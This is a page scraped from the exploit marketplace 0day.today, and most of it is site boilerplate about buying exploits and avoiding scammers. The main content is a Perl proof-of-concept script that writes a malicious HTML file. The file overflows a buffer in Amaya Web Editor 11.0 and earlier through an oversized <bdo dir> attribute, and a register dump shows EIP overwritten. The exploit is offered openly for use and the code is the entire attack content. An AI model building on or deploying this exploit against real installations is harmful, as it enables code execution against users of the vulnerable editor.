0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Amaya Web Editor <= 11.0 Remote Buffer Overflow PoC
=================================================== Amaya Web Editor <= 11.0 Remote Buffer Overflow PoC =================================================== #!/usr/bin/perl -w # Amaya Web Editor <= 11.0 Remote Buffer Overflow P0c # By Mountassif Moad (Stack) # Here D : http://www.w3.org/Amaya/Distribution/amaya-WinXP-11.0.exe # EAX 00000001 # ECX 0F866A64 # EDX 0083AA64 amaya.0083AA64 # EBX 00000000 # ESP 0012D080 # EBP 00000006 # ESI 0B425D00 # EDI 0085AD9C ASCII "src" # EIP 44444444 print "===================================================================== \n"; print "Author : Stack \n"; print "===================================================================== \n"; my $code ="<html>"."\n". '<bdo dir="'."\n"; my $bof = "\x41" x 160; my $bof2 = "\x43" x 8; my $bof3 = "\x44" x 4; my $coding ='">'."\n". "Heap</bdo>"."\n". "</html>"; my $file="St_.html"; $exploit = $code.$bof.$bof2.$bof3.$coding; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $exploit ; close($FILE); print "$file has been created \n"; # 0day.today [2024-11-15] #